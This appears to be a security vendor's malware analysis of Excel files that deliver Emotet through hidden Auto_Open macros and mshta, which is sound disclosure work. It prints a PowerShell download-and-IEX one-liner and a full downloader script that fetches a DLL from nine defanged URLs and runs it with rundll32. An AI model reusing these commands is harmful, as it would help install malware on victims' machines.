Emotet Being Distributed Using Excel Files

The ASEC analysis team has discovered the constant distribution of Excel files that started last month. These files are made to download Emotet, and they prompt users to enable macros (see figure below).

Figure 1. Malicious Excel file 1

Figure 2. Malicious Excel file 2

As the files have Auto_Open designated in the macro name box for a cell that exists in a hidden sheet, the formula in the cell is automatically run when the user clicks the Enable Content button.

Figure 3. Hidden sheet and name box in Excel file

The cell designated with Auto_Open contains a command that runs mshta (see figure below).

Figure 4. Code hidden in sheet

As hxxp://92.255.57[.]195/ru/ru.html includes a script that runs Powershell commands, mshta can run Powershell to perform malicious behaviors.

Figure 5. Script in ru.html

The following Powershell command is run by the script shown above.

  • powershell -noexit $JI ='(New-Object Net.WebClient).DownloadString(”hxxp://92.255.57[.]195/ru/ru.png”)’; IEX $JI | IEX

Additional script exists within hxxp://92.255.57[.]195/ru/ru.png, which is accessed via the above powershell command. The script contains multiple URLs that download Emotet. After accessing each URL in order, it downloads malicious DLL files and saves them in C:\Users\Public\Documents\ssd.dll. It then runs the downloaded files via rundll32.exe.

$path = "C:\Users\Public\Documents\ssd.dll";
$url1 = 'hxxp://chicagocloudgroup.com/wp-content/updraft/GBLpmsxC3TJzRT4iX4H/';
$url2 = 'hxxp://mijinogu.com/img/6TIRyK3zmCWqa42lxh/';
$url3 = 'hxxp://vulkanvegasbonus.jeunete.com/wp-content/yQX9yEik3TKo5Gg/';
$url4 = 'hxxps://hammerpzjx.xyz/qatta/VOWHxsTY4TllKdfHIiw/';
$url5 = 'hxxp://comsatnet.com/ComsatNet/Cfga/';
$url6 = 'hxxps://guardagfq.xyz/wp-content/P1ZRZyNP/';
$url7 = 'hxxp://_dc-mx.1b584bc01d04.artichain.finance/doc/LIXRmRqj/';
$url8 = 'hxxp://olgazadonskaya.com/music/SpGFuQkTMwkw0L9yc0/';
$url9 = 'hxxps://a.easeth.work/assets/hBDR/';

$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9".split(",");
foreach ($url in $urls) {
   try {
       $web.DownloadFile($url, $path);
       if ((Get-Item $path).Length -ge 30000) {
           [Diagnostics.Process];
           break;
       }
   }
   catch{}
} 
Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;

When the downloaded malicious DLL files are executed by Emotet, they self-copy as C:\Windows\system32\[random name]\[random name].agc and run [random name].agc by having DllRegisterServer as an argument. The malware attempts to access multiple C&C server URLs when files are run. If it succeeds, it can perform malicious behaviors such as receiving commands from the attacker to download additional malware.

As the Excel files containing this malware type are distributed through emails, it is advised for the users to take caution against emails from unknown senders. Since Emotet has been continuously downloaded via file formats such as Word and Excel, users should refrain from enabling macros for files from unknown sources.

V3 detects and blocks the malware using the aliases below.

[File Detection]

  • Downloader/XLS.Generic
  • Malware/Win.Generic.R466206

[IOC Info]

  • 3e8142e24f51fe068008092a5ba10388
  • 519525d3fa350c5c842cf446258a5af9
  • e2baebf4d9bcbfe4a8ce7df6a52e2baa

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:

0 0 votes
Article Rating
guest
2 Comments
Inline Feedbacks
View all comments
trackback

[…] Excel files that download Emotet. The team has introduced this type of malware in the post ‘Emotet Being Distributed Using Excel Files‘ last month. At that time, only types of Excel files that use macro sheets were found, but […]

trackback

[…] Emotet Being Distributed Using Excel Files […]